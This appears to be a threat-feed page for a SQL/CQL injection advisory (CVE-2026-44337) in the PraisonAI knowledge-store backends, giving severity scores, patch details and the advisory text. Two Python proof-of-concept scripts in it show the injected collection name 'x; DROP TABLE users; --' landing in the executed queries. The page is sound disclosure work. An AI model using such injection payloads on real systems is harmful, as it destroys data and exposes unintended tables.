AI Threat Alert AI Threat Alert

CVE-2026-44337

GHSA-3643-7v76-5cj2 MEDIUM
Published May 11, 2026

### Summary PraisonAI exposes optional SQL/CQL-backed knowledge-store implementations that build table and index identifiers from unvalidated `name` and `collection` arguments. Applications that pass untrusted collection names into these backends can trigger SQL or CQL injection. ### Details This...

Full CISO analysis pending enrichment.

Affected Systems

Package Ecosystem Vulnerable Range Patched
PraisonAI pip >= 2.4.1, <= 4.6.33 4.6.34
1 dependents 84% patched ~0d to patch Full package profile →

Do you use PraisonAI? You're affected.

Severity & Risk

CVSS 3.1
6.3 / 10
EPSS
0.1%
chance of exploitation in 30 days
Higher than 20% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
No known exploitation
Sophistication
N/A

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C Low
I Low
A Low

Recommended Action

Patch available

Update PraisonAI to version 4.6.34

Compliance Impact

Compliance analysis pending. Sign in for full compliance mapping when available.

Frequently Asked Questions

What is CVE-2026-44337?

PraisonAI knowledge-store backends interpolate unvalidated collection names into SQL and CQL queries

Is CVE-2026-44337 actively exploited?

No confirmed active exploitation of CVE-2026-44337 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44337?

Update to patched version: PraisonAI 4.6.34.

What is the CVSS score for CVE-2026-44337?

CVE-2026-44337 has a CVSS v3.1 base score of 6.3 (MEDIUM). The EPSS exploitation probability is 0.07%.

Technical Details

NVD Description

### Summary PraisonAI exposes optional SQL/CQL-backed knowledge-store implementations that build table and index identifiers from unvalidated `name` and `collection` arguments. Applications that pass untrusted collection names into these backends can trigger SQL or CQL injection. ### Details This issue affects the public persistence layer exported by [persistence/__init__.py](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/__init__.py:1), which exposes `KnowledgeStore` and `create_knowledge_store()`. The factory wires the affected backends as supported knowledge-store providers in [[persistence/factory.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:112)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/[persistence/factory.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:162):112): - `pgvector` at [[persistence/factory.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:170)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/[persistence/factory.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:186):162) - `cassandra` at [persistence/factory.py](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:170) - `singlestore_vector` at [persistence/factory.py](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/factory.py:186) The common root cause is that the `KnowledgeStore` interface accepts free-form collection names in `create_collection()`, `delete_collection()`, `insert()`, `upsert()`, `search()`, `get()`, `delete()`, and `count()` at [[persistence/knowledge/base.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/base.py:44)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/base.py:44), but the affected backends interpolate those values directly into query text instead of validating or quoting them. Representative sinks: - `SingleStoreVectorKnowledgeStore` builds `table_name = f"{self.table_prefix}{name}"` and executes raw DDL in [[persistence/knowledge/singlestore_vector.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/singlestore_vector.py:92)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/singlestore_vector.py:92). The same pattern is reused for `delete_collection`, `insert`, `upsert`, `search`, `get`, `delete`, and `count`. - `PGVectorKnowledgeStore` builds `public.praison_vec_{collection}` and `idx_{name}_embedding` directly into SQL in [[persistence/knowledge/pgvector.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/pgvector.py:82)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/pgvector.py:82). - `CassandraKnowledgeStore` interpolates `name` and `collection` directly into `CREATE TABLE`, `DROP TABLE`, `INSERT`, `SELECT`, `DELETE`, and `COUNT` statements in [[persistence/knowledge/cassandra.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/cassandra.py:73)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/knowledge/cassandra.py:73). There is already an internal identifier validator in the conversation persistence layer: - `validate_identifier()` only allows alphanumeric characters and underscores in [[persistence/conversation/base.py](https://github.com/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/conversation/base.py:18)](/Users/shmulc/Stuff/tmp/first-cve/scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence/conversation/base.py:18) That validator is used for SQL identifiers such as `table_prefix` and `schema` in the conversation stores, but no equivalent validation is applied in the affected knowledge-store backends. Version scope: - `pgvector.py` and `cassandra.py` were already present by `v2.4.1` - `singlestore_vector.py` was present by `v2.4.3` - the current PyPI release on May 1, 2026 is `4.6.33`, and the same interpolation patterns are still present Scope note for maintainers: I did not identify a built-in PraisonAI HTTP endpoint that forwards external request data into these specific persistence methods. The issue is in the package's public persistence APIs and affects applications that pass untrusted collection names to the affected backends. ### PoC The following local reproductions show that attacker-controlled collection names become part of the executed SQL text. 1. Reproduce the `SingleStoreVectorKnowledgeStore.delete_collection()` query construction: ```bash python3 - <<'PY' import importlib.util import pathlib import sys import types base = pathlib.Path("scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence") mods = { "praisonai": types.ModuleType("praisonai"), "praisonai.persistence": types.ModuleType("praisonai.persistence"), "praisonai.persistence.knowledge": types.ModuleType("praisonai.persistence.knowledge"), } for k, v in mods.items(): v.__path__ = [] sys.modules[k] = v def load(name, path): spec = importlib.util.spec_from_file_location(name, path) mod = importlib.util.module_from_spec(spec) sys.modules[name] = mod spec.loader.exec_module(mod) return mod load("praisonai.persistence.knowledge.base", base / "knowledge" / "base.py") ss = load("praisonai.persistence.knowledge.singlestore_vector", base / "knowledge" / "singlestore_vector.py") class FakeCursor: def __init__(self, parent): self.parent = parent def execute(self, query, params=None): self.parent.calls.append((query, params)) def __enter__(self): return self def __exit__(self, *args): return False class FakeConn: def __init__(self): self.calls = [] def cursor(self): return FakeCursor(self) store = ss.SingleStoreVectorKnowledgeStore() store._initialized = True store._conn = FakeConn() store.delete_collection("x; DROP TABLE users; --") print(store._conn.calls[-1][0].strip()) PY ``` Observed result: ```text DROP TABLE IF EXISTS praisonai_x; DROP TABLE users; -- ``` 2. Reproduce the `PGVectorKnowledgeStore.create_collection()` query construction: ```bash python3 - <<'PY' import importlib.util import pathlib import sys import types base = pathlib.Path("scans/variant-hunt/PraisonAI/src/praisonai/praisonai/persistence") mods = { "praisonai": types.ModuleType("praisonai"), "praisonai.persistence": types.ModuleType("praisonai.persistence"), "praisonai.persistence.knowledge": types.ModuleType("praisonai.persistence.knowledge"), } for k, v in mods.items(): v.__path__ = [] sys.modules[k] = v def load(name, path): spec = importlib.util.spec_from_file_location(name, path) mod = importlib.util.module_from_spec(spec) sys.modules[name] = mod spec.loader.exec_module(mod) return mod load("praisonai.persistence.knowledge.base", base / "knowledge" / "base.py") psycopg2 = types.ModuleType("psycopg2") extras = types.ModuleType("psycopg2.extras") pool = types.ModuleType("psycopg2.pool") class DummyPool: def __init__(self, *a, **k): pass def getconn(self): return None def putconn(self, c): pass pool.ThreadedConnectionPool = DummyPool extras.RealDictCursor = object psycopg2.pool = pool sys.modules["psycopg2"] = psycopg2 sys.modules["psycopg2.pool"] = pool sys.modules["psycopg2.extras"] = extras pg = load("praisonai.persistence.knowledge.pgvector", base / "knowledge" / "pgvector.py") class FakeCursor: def __init__(self, parent): self.parent = parent def execute(self, query, params=None): self.parent.calls.append((query, params)) def __enter__(self): return self def __exit__(self, *args): return False class FakeConn: def __init__(self): self.calls = [] def cursor(self): return FakeCursor(self) def commit(self): pass store = pg.PGVectorKnowledgeStore(auto_create_extension=False) conn = FakeConn() store._get_conn = lambda: conn store._put_conn = lambda c: None store.create_collection("x; DROP TABLE users; --", 3) for query, _ in conn.calls: print(query.strip()) PY ``` Observed result includes: ```text CREATE TABLE IF NOT EXISTS public.praison_vec_x; DROP TABLE users; -- ( CREATE INDEX IF NOT EXISTS idx_x; DROP TABLE users; --_embedding ``` The Cassandra backend follows the same pattern in its `CREATE TABLE`, `DROP TABLE`, `INSERT`, `SELECT`, and `DELETE` statements. ### Impact This issue affects applications that use PraisonAI's optional SQL/CQL knowledge-store backends and pass untrusted collection names into them. Potential impact depends on backend and driver behavior, but includes: - malformed queries and backend errors - access to unintended tables or indexes - execution of attacker-influenced SQL or CQL text where the backend/driver accepts the resulting statement shape I did not confirm direct exposure through PraisonAI's built-in HTTP server surfaces, so this is best understood as a vulnerability in the package's public persistence APIs rather than a turnkey remote exploit in the default application server.

Weaknesses (CWE)

CWE-20 Improper Input Validation Primary CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

References

Timeline

Published
May 11, 2026
Last Modified
May 11, 2026
First Seen
May 11, 2026

Related Vulnerabilities

CRITICAL GHSA-vc46-vw85-3wvm 9.8

PraisonAI: RCE via malicious workflow YAML execution

Same package: praisonai
CRITICAL GHSA-9qhq-v63v-fv3j 9.8

PraisonAI: RCE via MCP command injection

Same package: praisonai
CRITICAL CVE-2026-39890 9.8

PraisonAI: YAML deserialization enables unauthenticated RCE

Same package: praisonai
CRITICAL GHSA-2763-cj5r-c79m 9.7

PraisonAI: RCE via shell injection in agent workflows

Same package: praisonai
CRITICAL CVE-2026-44336 9.6

Analysis pending

Same package: praisonai
Back to Threat Feed